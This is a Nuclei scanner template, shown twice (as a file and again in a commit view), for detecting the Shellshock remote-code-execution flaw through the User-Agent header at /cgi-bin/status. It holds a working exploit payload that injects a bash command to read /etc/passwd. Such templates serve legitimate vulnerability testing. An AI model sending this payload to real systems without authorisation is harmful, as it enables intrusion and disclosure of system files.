nuclei-templates/vulnerabilities/rce-shellshock-user-agent.yaml

id: rce-user-agent-shell-shock

info:
 name: Remote Code Execution Via (User-Agent)
 author: 0xelkomy
 severity: high

requests:
 - method: GET
   headers:
    User-Agent: "{ :;}; echo $(</etc/passwd)"
   path:
    - "{{BaseURL}}/cgi-bin/status"
   matchers:
    - type: word
      words:
       - "/bin/sh"
       - "/bin/bash"
      part: body
Create rce-shellshock-user-agent.yaml 2020-05-28 15:20:00 +00:00			`id: rce-user-agent-shell-shock`

			`info:`
			`name: Remote Code Execution Via (User-Agent)`
			`author: 0xelkomy`
			`severity: high`

			`requests:`
			`- method: GET`
			`headers:`
			`User-Agent: "{ :;}; echo $(</etc/passwd)"`
			`path:`
			`- "{{BaseURL}}/cgi-bin/status"`
			`matchers:`
			`- type: word`
			`words:`
			`- "/bin/sh"`
			`- "/bin/bash"`
			`part: body`